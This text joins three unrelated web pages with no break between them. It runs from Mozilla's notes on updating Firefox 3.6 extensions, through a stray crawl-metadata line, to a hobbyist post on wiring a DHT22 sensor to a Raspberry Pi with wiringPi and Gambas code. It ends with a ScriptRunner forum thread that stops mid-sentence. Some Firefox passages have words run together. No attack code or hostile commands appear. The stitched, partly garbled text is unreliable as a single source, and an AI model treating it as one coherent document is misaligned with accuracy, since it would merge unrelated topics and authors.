This article provides helpful information to extension developers trying to update their extensions to work properly in Firefox 3.6. User interface changes Right-clicking on elements (including links and images) no longer offers a "Properties" menu item. The properties dialog box was not useful for most users and has been removed. If your extension interacts with that menu item in any way, you'll need to revise your code to add it yourself, or contribute your own context menu entry directly. Add-on package changes In order to allow add-ons' icons to be displayed even when they're disabled, Gecko 1.9.2 added support for automatically detecting and using an icon named icon.png, located in the add-on's root directory. This is used if the add-on is disabled, or if the manifest is missing an iconURL entry. HTML 5 compliance improvements The DOM Level 2 views to HTML and XHTML documents are now unified per HTML 5. - The localNameDOM property now returns the name of HTML element nodes in lower case. Previously, in HTML documents, it returned it in upper case. (DOM Level 1 tagNamecontinues to return in upper case in HTML documents.) - The namespaceURIDOM property now returns ""on HTML element nodes. Previously, in HTML documents, it returned null. document.createElementNS(null, "FOO")no longer creates an HTML element node in HTML documents. document.createElement("FOO")or document.createElementNS("", "foo")continue to work in HTML documents. - The nameand the local-namefunctions in XPath returns the name of HTML elements in lower case. Previously, in HTML documents, they returned it in upper case. The most probable upgrade problem is the pattern if (elt.localName == "FOO"). Example: Testing if an element is an HTML img element Firefox 3.6, both text/html and application/xhtml+xml if (elt.localName == "img" && elt.namespaceURI == "") Firefox 3.5 and 3.6, only extension-supplied text/html without foreign (e.g. SVG) script-inserted elements if (elt.tagName == "IMG") Firefox 3.5 and 3.6, both text/html and application/xhtml+xml if (elt instanceof HTMLImageElement) contents.rdf no longer supported Support for the obsolete contents.rdf method for registering chrome has been removed in Gecko 1.9.2, and is no longer supported by Firefox 3.6. This means that add-ons that use contents.rdf can no longer be installed. Make sure you include a chrome.manifest in your XPI.
https://developer.mozilla.org/en-US/Firefox/Releases/3.6/Updating_extensions
CC-MAIN-2016-30
refinedweb
402
53.07
Today, let's highlight an exciting and very useful contribution by Mark Vulfson at UpCodes Engineering and the entire UpCodes AI team, presented in his Revit API discussion forum thread on Revit Test Framework improvements. Many thanks to Mark and the UpCodes team for making this available! By the way, here are some previous notes on unit testing Revit add-ins. Hello everyone, We are currently developing a pretty elaborate Revit plugin, the UpCodes AI for building code automation: UpCodes AI is a design aid for architects and engineers. View code errors in real-time directly in Revit with a “spell check” for compliance. During the course of this work, we ran into many issues (and surely will run into many more), and this forum has helped us resolve many of them. We'd like to contribute something back to the community by telling you about the improvements we've made to the awesome Dynamo Revit unit test framework, RevitTestFramework or RTF, by the Dynamo team. It's an invaluable tool if you are developing a Revit add-in, as it allows you to run integration tests and control Revit in an automated fashion. However, the RTF hasn't had much development done on it in a while (other than making it compatible with Revit 2019) and as such we found a few things lacking; the biggest such shortcoming was a lack of NuGet package making usage of the RTF on a build server/continuous integration server very difficult. Along the way, we made a few other improvements that I think you will find interesting and useful. Summary of main changes we've made so far: - 1. Created a NuGet package - 2. Added the ability to group tests by the model - 3. Added ability to use wildcards for model filenames - 4. Clear messaging and indication of failures 1. Created a NuGet package You can download it here: 2. Added the ability to group tests by the model Opening a new RVT file for each test significantly slows down the execution of the tests. We wanted our Revit tests to run for each pull request our engineers make, so it has to be fast (and reliable). The groupByModel option significantly improves performance if you have multiple tests that operate on the same model. When using --groupByModel, the RTF will order the tests such that all tests that operate on the same model file are executed sequentially without closing and reopening the model. Naturally, it requires the --continuous parameter to be effective. Also, it goes without saying that if your tests leave side effects on a model which may break a subsequent test, this option will not work for you. Luckily for us, none of our tests have side effects (which, in general, is a good practice). 3. Added ability to use wildcards for model filenames We have multiple models which we want to run a particular test on. Today, every time we make a new model we have to copy/paste a unit test with a new model file. To make this simpler, you can now specify a wildcard for your model file on a test and RTF will enumerate all files in the directory and run the test on each one. For example: [TestFixture] public class TestAllModels { [Test, TestModel(@"C:\Models\test_models_2019\*.rvt")] public void SomeTest() { ... } } will run SomeTest on every RVT file it finds under C:\Models\test_models_2019. One of the ways we use this is for performance testing. All that this test does is measure the speed with which we finish processing a given model. This way, we can run the test suite on each release and assess whether we have significantly regressed our performance from our previous release. 4. Clear messaging and indication of failures Engineers don't love writing tests and they hate debugging tests. Especially, when diagnosing what went wrong is very difficult. We wanted to make sure that an engineer could: - Look at the log output from a build server and quickly be able to tell what went wrong and where to start debugging. - Run the test easily with nice UI on their local computer to quickly iterate on a solution to fix the problem. This includes: - Clear indication when a model file is not found (prior to that RTF would just silently complete the test suite without errors). - Automatically expand failing tests in the UI so that errors are super obvious. - Have a clear summary at the end of a test run for the number of passed/failed/etc tests. This way, you can go grab a coffee while the tests run and know if there were any errors with a quick glance at the summary. - We utilize categories (e.g. [Category("Doors")]) for grouping. But RTF UI didn't show tests without a category; this is now fixed. - All Console.PrintLinemessages from the actual unit tests are now sent back to the RTF server so you can see them in a single contiguous log – yay (this one is my favourite)! - Test completion information is displayed in the console as soon as the test itself is completed; RTF used to wait till all tests have finished before showing you the status of all individual tests; now each pass/fail is printed as soon as the test is completed. We also made a bunch of small bug fixes around the stability of the RTF. There is still work to be done on the framework, but we hope you find these changes useful. We are working with the Dynamo team to bring all these changes back to the main branch of RTF, but, for now, you are welcome to contribute with us in our forked RevitTestFramework repo. Mark – Engineering at UpCodes p.s. we are hiring – if you love building Revit add-ins please reach out!
https://thebuildingcoder.typepad.com/blog/2018/08/revit-unit-test-framework-improvements.html
CC-MAIN-2022-33
refinedweb
971
60.75
Hi all, I'm entering into a programming course next September and am trying to get the essentials of Java before hand. I attempted to create my first program but have learned that it's much easier when you can speak to someone who knows what they're doing. Anyway, here is my code: public class Taxtwo { /** * @param args */ public static void main(String[] args) { // TODO creating instance of a variable Taxone t = Taxone; t.income = 1000000; t.state = NY; t.dependants = 4; { public double t.calctax(); stateTax=0; if (income > 999999){ stateTax=income*0.75; { else stateTax=income*0.0001; } } return stateTax; double yourTax = t.calctax(); System.out.println("Your tax is" yourTax); My Error I get an error that says I cannot invoke primitive type double on the t.calctax method in the last few lines of class 2, and consequently the yourTax variable is invalid on the last line. Help mucho appreciado.
http://www.javaprogrammingforums.com/whats-wrong-my-code/9045-first-simple-two-classed-tax-program.html
CC-MAIN-2016-26
refinedweb
155
68.47
THE SQL Server Blog Spot on the Web I know it's been a while since my last post, and there is a specific reason for that, which I am going to tell you about. On February 5th, I emailed to my editor the LAST chapter of my new book, after the author reviews and all comments from the editors were answered. I was technically done, except for a bit of work on the Intro, etc. Less than an hour after I sent off that last chapter, I got a call from the Washington State Highway Patrol that my husband had been found at the side of the road; he was semi-conscious after having a major stroke. I have spent most of the last two weeks by his side at Harborview Hospital in Seattle. Although there is WiFi in the rooms and I was able to check email and keep family and close friends informed, there was little inclination or energy for blogging. Today, after all the final polishing by Microsoft Press, the pages were sent to the printer. The expected 'in print' date is March 11. It will be a week or so after that until the bookstores get it. I don't know how soon Amazon will be able to start shipping the pre-orders. I'm not going to post my husband's whole story here, but suffice it to say my life will be changing. I will need to cut back on traveling, but I do need to continue working. I may not be offering nearly as many public classes, so if you've ever wanted to take a class from me, I suggest you think about doing it sooner rather than later, because there might not be a later. I will start delivering the 2008 version of my SQL Server Internals course next month. (Probably 90-95% of the course is still relevant to SQL Server 2005.) Take care .... and in the words of one of my favorite singers/songwriters, James Taylor, Shower the people you love with love.... Shower the people you love with love.... ~Kalen If you would like to receive an email when updates are made to this post, please register here RSS My prayers go out to you and your family. Prayers and thoughts with you and your husband, Kalen. I hope he recovers fully and soon. Congratulations on the book (which I've had preordered for awhile now). My prayers go out to you and your family as well. Your focus definitely belongs on your husband now. Your family will be in my prayers. Kalen, may God keep you and your family in the hollow of His hand. My thoughts go with you. Lisa sends her love too. Kalen, family trumps everything else. Take care of your husband and yourself. We pray for his thorough recovery and will cross our fingers that he'll be well enough for you to make an appearance at PASS in November. Congratulations on finally finishing the book. Over the course of last year I became more & more aware of the importance of living life to its fullest. Yet as I sit here at a desk in a room far from home with work-related priorities pressing upon me, I’m wondering whether to take the time to do any sightseeing. Thanks to you, the decision is made: I’m going liberate myself from these walls & take advantage of this opportunity. Your post brings to mind a post I made last December on celebrating life, that this is the Year of the Tango: (Yes, painful as it must be for my lovely bride & our instructor, our lessons have begun.) I hope everything works out as well as possible. God bless you both. You’ll be in our prayers. And congrats on the book. Kalen, I wouldn't be where I am today were it not for your body of great work. Thank you. Dear Kalen Prayers and thoughts with you and your husband.I feel your pain as we undergo the same. Hi Kalen, This is terrible news. I feel so bad for you and your family. My thoughts are with you ... and I really hope that you will find a good way to balance the requirements in this new situation. I wish you all the strength and all the luck you need in this difficult situation. Thanks for sharing, and reminding us all how fragile the lives of ourselves and our beloved can be - and how a great achievement on the professional stage can shrink into total unimportance when faced with bad luck on the personal stage. My prayers and those of my family for you and your husband. May recover fully. It's often the case that love creates miracles; may that love be present with you both at this time. Sorry to hear this. My thoughts and Prayers with you. I wish your husband a speedy recovery. Regards Meher So sorry to hear the news about your husband. You and your family are in my caring thoughts. Congratulations on the book! Shows how fragile we are My prayers and thoughts for your family Hope for a complete recovery for your husband. Family always comes first. I am sorry to hear about your husband. I hope that he can make a full recovery. I'm glad I got to see one of your presentations at PASS2008. My prayers are with you. Chris I am truly sorry to hear the news about your husband. I hope he gets better soon. Your books have a special place in my shelf. Wish you well, AMB Kelen, Thanks for sharing with us your personal life and like so many others I wish your husband a full recovery. Prayers for speedy recovery . Let god bless you and your family Best Wishes I hope for the best for you and your family. We all pray for you and your family; congratulations on having your family as a priority over your work - I always knew you had your head on straight! {-: My prayers for you and your family, Kalen. Hope your husband recovers soon. Prayers for a speedy and full recovery! Life is so fragile, enjoy it to the fullest. My prayers go out to you and your family. P.S. I can't wait to read the book, I already ordered it at Amazon. My thought and prayers go out to you and your family. I have your new book on order from Amazon. Waiting for them to get it in to ship. I don't know how I missed this when you posted it.. Godspeed to you and your husband, Kalen. Your family is in our prayers. Hello Kalen, I'm sorry to hear this... My prayers go out to you and your family and I hope he gets better soon. I just ordered your new book. Thank for writing greate books. Jungsun Kim SQL Server MVP FYI: I got my pre-order yesterday...
http://sqlblog.com/blogs/kalen_delaney/archive/2009/02/18/my-book-is-at-the-printers.aspx
CC-MAIN-2014-52
refinedweb
1,167
83.56
Rob, Sorry for the slow response. I have thought quite a bit about this, but these days such cogitations don't always go anywhere useful. Advertising On Thursday 30 Aug 2012 21:58, Rob Arthan wrote: > On 11 Aug 2012, at 15:07, Roger Bishop Jones wrote: > > and a number of cases where identifiers which I had > > been using are now used in MathsEgs theories which are > > in my ancestry these include Tree TREE Pair > > Were you using these names for things of your own? Yes. > If so, > then perhaps this would be solved if the underlying > names of constants were prefixed with the theory name. > What I am considering in this area is an option > controlled by a flag (say "structured_HOL_namespace"), > which I would turn on towards the end of the HOL build, > whereby the HOL parser would do this for you. When you > define constant "xyz" in theory "abc", the underlying > name would be "xyz.abc" and "abc" would be introduced as > an alias for that. And likewise for types. This > behaviour would be optional and language-specific (e.g., > you wouldn't want it for Z, and you might not want it in > HOL). Would that have saved you any trouble? I don't think my problems with the new version of maths_egs are of any concern, and don't for me motivate changes. I do think changes in this area are desirable but I would say that my own prime motivation would be to move to a situation in which proof tools can make use of results obtained in other proof tools, i.e. the motivations for OpenTheory and my "X-Logic". I think being able to eliminate junk from theories is something which would help in that enterprise, and as it happens it would probably would also help to mange the above kind of problem. I think that probably would involve using compound constant names, at least behind the scenes, not necessarily in front of the children. But I'm not keen on the use of the ProofPower aliasing mechanism to manage the use of simple names. A key feature I think is simply to be able to hide names, or project a theory according to a signature, but also it would be nice to be able to rename on import. I am inclined now to think that it might have been a mistake to automatically inherit all the ancestry when adding a parent. This connects with the discussion about conservative extension, since it represents an alternative way of obtaining the kind of abstraction which "new_specification" provides, and possibly somewhat superior in that the details are all there, but not actually "exported". Putting it in that context, the idea that the structured namespace is something you opt into at some point seems to me doubtfull, though you might want it to default to behaviour which is backward compatible, i.e. if the local names are all globally unique then they will all get correctly resolved as at present. However, once you put it in this context, then you are really looking at a bigger problem in which concensus across theorem provers is essential. Personally, I think that shouldn't just be HOL provers, and as you know I advocate importing results even if proofs cannot be imported. As an example of what ideally might be possible, classical arithmetic is standard, no two provers should disagree about what is true (though they will differ about what they can prove), so exchange across any tool which is sound for first order arithmetic should be possible in that domain. All that of course is much more than you wanted to get into, and for my money you can safely do nothing here if your concern is just the occasional rework that people might have to do when you change maths_egs. > > (probably the most > > disruptive) and some identifiers consisting of or > > starting with subscripted "D". > > Really - I can't find any identifiers that start with a > subscripted character in the MathsEgs theories. The theory is topology which now contains some names which are the same as names you put into a bit of differential geometry you did for me way back. > > I have not yet considered a new way of building > > contribs. I feel that making MathsEgs build OK on the > > development system would not be productive in the > > absence of a little more clarity about how a contrib > > system would be expected to work. > > I had a discussion with Anthony Fox about how they do > things in HOL4 and that has given me some more ideas on > this. I think it is actually completely orthogonal to > how the ProofPower code is organised. Yes. I got confused when you issues the trial reorganisation and tried to build maths_egs out of the RCS, which didn't work, but it did build in the normal way of course. > In HOL4, the contents of a theory are exported to and > imported from text files. So if you have code associated > with a theory that you want to export to users of the > theory, you put that in a separate file and let users > load that file. As ML doesn't have separate compilation, > such code has to be provided as source. To make things > easier for the user, HOL4 has its own make function, > HOLmake, that automatically figures out dependencies > between a set of things you want to bring together and > loads them in the right order. Given that we don't have > HOLmake and we don't allow export and import from files, > this suggests to me that a contrib offering should > comprise ML source to build the theory and provide any > supporting ML functions etc. Which is of course what maths_egs does, and my own stuff based on that makefile. > Here is one possible set of conventions. The source of a > contrib offering, XYZ, comprises a directory containing > doc files together with a (UN*X) make file. The make > file has a target that build a database called XYZ, that > contains the contrib theories and associated ML and a > minimal set of dependencies. Users who want to start > from the contrib offering can just create children of > the database. The make file also has a target that > creates the ML source from the doc files and > concatenates them into an appropriate order to give a > single source file XYZ.ML (not XYZ.sml, since this will > typically not be directly derived from a single .doc > file). A built contrib offering would comprise the .doc > files plus PDF of those (and/or DVI?) plus the database > XYZ and the source file XYZ.ML. I don't understand why you are proposing this departure from the pattern set by maths_egs. > It would also be useful to maintain a ref to a list of > strings identifying the loaded contrib offerings. This > would be managed at the head and tail of XYZ.ML via > access functions that allow it to be interrogated and > extended. At the head we would have code to check that > all the dependencies are satisfied and to report on > anything that is missing (or you could be cleverer and > attempt to load the missing dependencies - so this would > be a bit like a mini-HOLmake, in which the contrib > provider has to declare the dependencies). At the tail > would be code to add the new contrib name to the list. > The contrib directories could be organised as a tree > with an initial contrib at the top that defines the list > of loaded offerings and includes tools for working with > it. > > As regards ML conventions, I would suggest that we don't > mandate the rigid packaging of things into structures > with signature constraints that ProofPower itself > follows, but do encourage people at least to collect all > the external interfaces into structures so that they can > be accessed if the plain name is accidentally recycled. > > How does that sound? Is it definite enough for you to > consider making a start? It seems to me more of a departure from present practise than I would have thought necessary. A question to answer is, what's wrong with just recommending that contribs follow the pattern set by maths_egs. I think there is only one problem, so long as there are not many contribs around and that is that to build more than one independent contrib into the same database you would have to hack one of the makefiles. This would be fixed if the makefiles consulted an environment variable to see whether they should build into an existing database. If there were more contribs around then the next step would be to manage the dependencies between them in some way, I'm a little surprised to see you hoping for me to contribute any signficant amount of scripting, since my scripting skills are very basic and my standards are very poor. If I did do anything non-trivial you would probably feel compelled to completely rewrite it! One the reorganisation of the ProofPower build system I don't have a clear view of your objectives. Are you aiming to make it more like the usual opensource arrangement whereby others can contribute by accessing the repository directly, and in much the same manner as you do (except that you control what changes actually go into the issued ProofPower)? I would have thought that this could be done without any radical changes to the organisation, its more a question of making the repository available and devising a protocol between you and other contributors for coming to agreements about what changes from them you are iikely to accept. Not that I have any experience of working in such a way. I no only the kind of arrangement under which ProofPower was originally developed. But I don't really see why that old fashioned method could not work in a distributed context, especially with the new respositories available. Roger _______________________________________________ Proofpower mailing list Proofpower@lemma-one.com
https://www.mail-archive.com/proofpower@lemma-one.com/msg00399.html
CC-MAIN-2017-34
refinedweb
1,669
65.66
#include <Pt/Xml/InputSource.h> Text input source for the XML reader. More... Inherits InputSource. Inherited by StringInputSource. This input source can read characters from an unicode based input stream, so it does not convert the encoding, but only parses the XML declaration. If no more characters can be read directly from the input stream buffer without blocking read operations, the virtual method onInput() is called. The number of available characters is returned, which can be 0 if no data is available. The derived input sources must call this method once the XML or text declaration is parsed or if none was found. Normally, this is done in the virtual methods onGet() and onImport(), which are called by the public interface methods get() and import() when no buffer was set yet. The passed buffer and declaration are owned by the derived class.
http://pt-framework.net/htdocs/classPt_1_1Xml_1_1TextInputSource.html
CC-MAIN-2018-34
refinedweb
142
62.27
Looking at the Airfoil web page, specifically, this one:. The measurements are all given in fractions of the depth of the airfoil. So you have to scale them. I was working with what may turn out to be a 48" rudder for a boat based on this design. I'm waiting for some details from the engineer who really knows this stuff. How do we turn these fractions into measurements for folks that work in feet and inches? We can use a spreadsheet -- and I suspect many folks would be successful spreadsheeting this data. For some reason, that's not my first choice. I worry about accidental copy and paste errors or some other fat-finger blunder in a spreadsheet. With code, it's easy to reproduce the results from the source as needed. Here's the raw data. Part 1. Fractions. from fractions import Fraction class Improper(Fraction): def __str__( self ): whole= int(self) fract= self-whole if fract == 0: return '{0}'.format(whole) if whole == 0: return '{0}'.format(fract) return '{0} {1}'.format(whole,fract) The idea is to be able to produce improper fractions like 47 ½" or 24" or ¾". My Macintosh magically rewrites fractions into a better-looking Unicode sequence. I didn't include that feature in the above version of Improper. Mostly because in Courier, the generic fractions look kind of icky. The raw data is readable as a kind of CSV file. import csv def get_data( source ): rdr= csv.reader( source, delimiter=' ', skipinitialspace=True ) heading= next(rdr) print( heading ) for row in rdr: yield float(row[0]), float(row[1]) That saves fooling around with parsing -- we get the profile numbers from the raw data as a pair of floats. Finally, the report. def report( seligdatfile, depth, unit ): scale=16 #th of an inch for d, t in get_data( source ): d_in, t_in = d*depth, t*depth d_scale = Improper( int(d_in*scale), scale ) t_scale = Improper( int(t_in*scale), scale ) print( '{0:6.2f} {unit} {1:6.2f} {unit} | {2:>8s} {unit} {3:>8s} {unit}'.format( d_in, t_in, d_scale, t_scale, unit=unit) ) This gives us a pleasant-enough table of the measurements in decimal places and fractions. We can use this for any of the variant airfoils available. Here's the top-level script. import urllib.request with urllib.request.urlopen( "" ) as source: seligdatfile= source.read().decode("ASCII") import io with io.StringIO( seligdatfile ) as source: report( source, depth=48, unit="in." ) I'm guessing the data files are ASCII encoded, not UTF-8. It doesn't appear to matter too much, and it's an easy change to make if they track down an airfoil data file what has a character that's not ASCII, but UTF-8.
http://slott-softwarearchitect.blogspot.com/2014/01/not-in-hamcalc-but-perhaps-should-be.html
CC-MAIN-2017-17
refinedweb
455
68.06
The DHT22 is a low cost, single wire sensor which measures temperature and relative humidity. I started out just playing around with this thing, just wiring it to a Pi to see it working. But I got sucked in much deeper into thinking about how it worked and assessing its limitations. Output Data Stream The DHT22 produces a serial stream of data. In other words the sensor has just one "wire" over which it sends data and receives commands. It does this by simply raising and lowering the voltage level, and varying the amount of time that the wire is either "high" or "low". In my circuit "high" is approximately 3.3 Volts, while low is approximately 0 Volts. A logical 1 waveform looks like this:- While logical 0 is like this:- There should be 40 of these zeros and ones in a complete data set, and this data stream may start out looking something like this:- 00000010 00110101 0000...The first 2 bytes contain the rh (relative humidity) value. In this example:- 02hex & 34hex = 234hex = 564As data values are 10 x actual readings, 564 is an rh of 56.4%. Likewise, the third and forth bytes represent 10 x the temperature reading. The Checksum In order to validate the integrity of the sensors transmitted data, the unit generates a simple checksum, which occupies that last byte of the 40 bit data stream. This sensor calculates the checksum by adding the 4 data bytes together, and using only the lower 8 bits of the result as the 1 byte checksum. Here is an example where the rh is 60.2% and temperature is 23.1'C:- 60.2%: 602 = 025Ahex, so byte 1 = 02hex and byte 2 = 5AhexSo the high byte is disgarded, and the checksum becomes 43hex. 23.1: 231 = E7hex, so byte 3 = 00hex and byte 4 = E7hex 02h + 5Ah + 00h + E7h = 143h When our system [software] reads this data it simply repeats the process and checks the result against the checksum. If there was a data transmission or reception error, our calculated checksum will not match the checksum transmitted from the sensor, so we can ignore this bad data. There are of course a couple of exceptions. If the data error is in the 1st or 3rd bytes, this error will not be detected by the checksum, because we only use the lower 8 bits of the result. Also, it is possible that 2 or more errors may cancel one another out (e.g. a -1 error in rh and a -1 error in received checksum). However, in the first case, an error in the 1st or 3rd bytes will make a very large difference to either the rh or temperature. For example, 01hex in the first byte is 256. This would be a change of 25.6% rh (or 25.6'C for the 3rd byte). In the second case? Well, someone with good maths abilities could probably tell me the likelyhood of canceling errors. Connecting sensor to Pi The DHT22 is a four terminal package, but only pins 1, 2 & 4 are used. I simply plugged it into a breadboard and wired as follows:- Initially I fitted a 10k Ohm resistor to pins 1 & 2. During testing I replaced this with a 4.7k and also added a 0.1uF capacitor across the supply pins (1 & 4) although these changes did not appear to make any significant improvement in performance. Testing with wiringPi Once again I'm relying on Gordon's wiringPi software, and here are a few points regarding the notes that follow. Once wiringPi is downloaded (use the latest snapshot) it should be unzipped and located on the RaspberryPi in a suitable folder (e.g. /home/pi/wiringPi-version). The Pi uses pcManFM filemanager. If you navigate to a folder then press F4, a terminal window will open at that point in the file system. So where I say: run sudo ./rht03 in examples, I mean navigate to /home/pi/wiringPi-version/examples, press F4, and type: sudo ./rht03 in terminal. So lets start by building wiringPi:- Run ./build from your wiringPi-version folder. The terminal should show something like this:- wiringPi Build script ===================== WiringPi Library [UnInstall] [Compile] wiringPi.c [Compile] wiringSerial.c [Compile] wiringShift.c [Compile] piHiPri.c ..... All Done Now open rht03.c in the examples folder (e.g. edit in LeafPad). Change pin number to suit your wiring using wiringPi pin numbers, in my case:- #define RHT03_PIN 15 Run make rht03 from the examples folder. Now run the demo program by typing: sudo ./rht03 from the examples folder. You may start to see rh and temperature readings displayed in your terminal. However, you may also notice your Pi soon becomes paralyzed as the cpu load sits at 100%. Put the little critter out of its misery by hitting <ctrl><c> I opened rht03.c again at added a 5 second sleep: #include <stdio.h> #include <unistd.h> #include <wiringPi.h> #include <maxdetect.h> #define RHT03_PIN 15 ... for (;;) { delay (100) ; sleep(5); if (!readRHT03 (RHT03_PIN, &newTemp, &newRh)) After saving, making and running rht03 again, I found the cpu load to be reasonably low, and the screen spat out readings from time to time. Sometimes the readings appeared 5 seconds apart, and sometimes there were much longer gaps. I had another look at rht03.c and noticed that it doesn't output results unless they have changed since last time, hence the apparently erratic display rate. This demo program calls readRHT03 which is in ../devLib/maxdetect.c. This file contains most of the routines used to talk to the DHT22 sensor. Very basically: readRHT03 calls maxDetectRead which "wakes up" the sensor by holding the data line low for 10ms and then pulsing it high for 40us. It then calls maxDetectLowHighWait and waits for the data line to switch from a high to a low state (this is the signal from the sensor indicating that data transmission is about to follow). The maxDetectRead routine then calls maxDetectClockByte which checks if the data line is a 1 or a 0 (after a 30us delay) and uses this to build up the data, bit-by-bit. I decided to sprinkle this code with printf so I could see more closely what was going on. #include <stdio.h> int maxDetectRead (const int pin, unsigned char buffer [4]) { int i ; unsigned int checksum ; unsigned char localBuf [5] ; // Wake up the RHT03 by pulling the data line low, then high // Low for 10mS, high for 40uS. pinMode (pin, OUTPUT) ; digitalWrite (pin, 0) ; delay (10) ; digitalWrite (pin, 1) ; delayMicroseconds (40) ; pinMode (pin, INPUT) ; // Now wait for sensor to pull pin low maxDetectLowHighWait (pin) ; // and read in 5 bytes (40 bits) for (i = 0 ; i < 5 ; ++i) localBuf [i] = maxDetectClockByte (pin) ; checksum = 0 ; for (i = 0 ; i < 4 ; ++i) { buffer [i] = localBuf [i] ; printf("localbuf: %d: %#x\n", i, localBuf [i]); checksum += localBuf [i] ; } checksum &= 0xFF ; printf("checksum: %#x...Buff: %#x....", checksum, localBuf[4]); return checksum == localBuf [4] ; } /* * readRHT03: * Read the Temperature & Humidity from an RHT03 sensor ********************************************************************************* */ int readRHT03 (const int pin, int *temp, int *rh) { static unsigned int nextTime = 0 ; static int lastTemp = 0 ; static int lastRh = 0 ; static int lastResult = TRUE ; unsigned char buffer [4] ; // Don't read more than once a second if (millis () < nextTime) { *temp = lastTemp ; *rh = lastRh ; return lastResult ; } lastResult = maxDetectRead (pin, buffer) ; printf("lastResult: %d\n", lastResult); if (lastResult) { *temp = lastTemp = (buffer [2] * 256 + buffer [3]) ; *rh = lastRh = (buffer [0] * 256 + buffer [1]) ; nextTime = millis () + 2000 ; return TRUE ; } else { return FALSE ; } } After running ./build in wiringPi-version folder and restarting sudo ./rht03 I get an output in terminal like this. You can see a checksum error for the data block with lastResult: 0 I'm probably seeing approx 15% of results with checksum errors. I don't know if this is typical for this sensor. Testing with Gambas In order to use Gambas to write a test program, I hacked wiringPi (similar to the method I used here) to create a single library that supports this temperature sensor. The wiringPi routine was then declared in Gambas like this:- Public Extern readRHT03(iPin As Integer, ptrTemp As Pointer, ptrRH As Pointer) As Integer ...and I used a Gambas routine a bit like this:- Public Sub ReadTemp() Dim iReply As Integer Dim intTemp As Integer Dim intRH As Integer iReply = readRHT03(15, VarPtr(intTemp), VarPtr(intRH)) If iReply > 0 Then Inc lngReadings If blnStarted Then If intTemp > intLastTemp + 50 Or intTemp < intLastTemp - 50 Then Inc lngErrorCount Endif If intRH > intLastHumid + 50 Or intRH < intLastHumid - 50 Then Inc lngErrorCount Endif Else blnStarted = True Endif intLastTemp = intTemp intLastHumid = intRH Label1.text = CStr(intTemp/10) & "'C" Label2.text = CStr(intRH/10) & "%" Endif Note that intTemp and intRH are 10x the actual value, so have to be divided by 10 for display. This test program took readings from the DHT22 at 10 second intervals and also recorded the total number of readings and the number of errors. I did not record checksum errors, I only recorded readings which were either more than 5'C or 5% different from the previous reading. So this error count may include data error in the high order data byte which do not affect the calculated checksum. In approximately 3500 readings I recorded 5 errors. Conclusion Since the DHT22 is designed to measure temperature and relative humidity in an environment like a house, it is not too much of a problem to drop readings when a checksum error is detected, or when a reading is clearly very different from previous and subsequent readings. So with that in mind I should be able to find a use for this thing. See also: DHT22: is it damp under my house? Thanks man, this is only guide that got my AM2302 working without any problems, cheers!
http://captainbodgit.blogspot.com/2014/12/dht22-temperaturerh-sensor-on.html
CC-MAIN-2017-34
refinedweb
1,638
62.78
must be a sequence of tokens. y. device (Union[str, torch.device]) – specifies which device updates are accumulated on. Setting the metric’s device to be the same as your updatearguments ensures the updatemethod is non-blocking. By default, CPU. Example: from ignite.metrics import Rouge m = Rouge(variants=["L", "2"], multiref="best") candidate = "the cat is not there".split() references = [ "the cat is on the mat".split(), "there is a cat on the mat".split() ] m.update((candidate, references)) m.compute() >>> {'Rouge-L-P': 0.6, 'Rouge-L-R': 0.5, 'Rouge-L-F': 0.5, 'Rouge-2-P': 0.5, 'Rouge-2-R': 0.4, 'Rouge-2-F': 0.4} New in version 0.4 -
https://pytorch.org/ignite/v0.4.5/generated/ignite.metrics.Rouge.html
CC-MAIN-2022-27
refinedweb
117
66.5
This guide explains the steps required to start using Bluetooth low energy (BLE) beacons to provide proximity-based experiences for your users. The steps you must take here depend on the way you plan to use your beacons. Ways to use beacons. Beacon Tools app. -. To add an attachment: - Click the down-arrow next to View beacon details and select attachments. - Enter the Type, and Value for the attachment. The value for Namespace is fixed, depending on the Google Developers Console project that you selected. - Click the plus sign (+) to add the attachment. - Beacon Tools app You can use the Beacon Tools app to associate attachments with beacons by following these steps: - Install the Beacon Tools app (Android, iOS). - Launch the app. You'll see a list of beacons near you. If your beacon has been registered with Google, it will appear under the Registered tab. If not, you'll need to register your beacon. - Tap your beacon in the list to select it. - To add a new attachment, click the plus sign (+) next to Attachments, and enter the attachment data. - Under Namespaced Type enter a two-letter language code. Currently the namespace value is fixed to the Google Developers Console project that the beacon was registered under. The ability to edit the namespace is coming soon. Under Data enter an attachment. For example: Beacon edd1ebeac04e5defa023 at your service! Tap the checkmark icon to save your changes.. Developer Guidelines As you build proximity-based experiences for your users, you might collect and manage user information through your apps. For example, some of the information that you collect may allow you to infer a user's location or activity. Your users trust you to do the right thing with their data. It's your responsibility to do so, but keep these key principles in mind: - Comply with all relevant privacy laws and regulations when handling user information. - Provide users with (and follow) a privacy policy explaining what user information you collect and how you use it. - Honor user requests to delete their data. - Carefully review the Terms of Service before using the Proximity Beacon API, and other terms of service which may apply to your use of other Google APIs, for example the Nearby Messages API.
https://developers.google.com/beacons/get-started
CC-MAIN-2019-35
refinedweb
375
66.64
It's not the same without you Join the community to find out what other Atlassian users are discussing, debating and creating. Hello, Our organization is relatively new to JIRA (less than 2 years old) and few months back we purchased ScriptRunner to further customize our setup. We would like to create a "dropdown" field that would pull static values from another "text" field. These fields are used on different screens. I think we may have to include a filter with the below logic inside a script to load values for the dropdown field. Custom Field 1 (existing) - Subsystem name (text) Custom Field 2 (new) - Application (dropdown) "Application" field available values = "Subsystem name" field values (CONDITION -> project = "eRA Component Model" AND issuetype = Subsystem AND isactive = Yes) How do I implement this? Please advice. Thanks, Venkat Hi Venkat You can get the project through the getIssueContext(), for example def selectedProjectKey = getIssueContext().getProjectObject().getKey() // or for the name def selectedProjectName = getIssueContext().getProjectObject().getName() regards, Thanos Thanks a lot, Thanos. That worked. However, I couldnt get the behaviour to work on "Project" field change, I had to use another field, like "Issue Type", then the above script would work as desired. BTW, the above solution is to make a text field a select field with JQL output that list ISsues from another project. Is there a way to list values of a particular field and only that field (no Issue key) as values of the select field? Does it have to be like a embedded SQL of some sort? Thanks for your assistance. Venkat. Oh yes sorry forgot to mention that it should have been an initialiser script. For the second part of your question could you please give an example ? No problem. Thanks. For the second part of the question, from my above example, is it possible to not show the Issue key, but only display the summary field values? Please see the attached image. In the image, I dont want to see "ECM-2" in the dropdown. Thanks.selectlistconversions.jpg Hi Venkat, One way would be to create your own rest endpoint for it, and then call this one in your conversionList. Very similar to the documentation example Pick Issue from remote JIRA and having something like response.sections.each { section -> section.issues.each { it.remove("summary") it.remove("summaryText") } } Let me try to see if there is a way via an ajaxOption (I have to check the src code) regards, Thanos Thanks Thanos. Let me take a look at your suggestions and get back to you. Hi Thanos, I tried the example you pointed me to and it doesn seem to pull any Issues 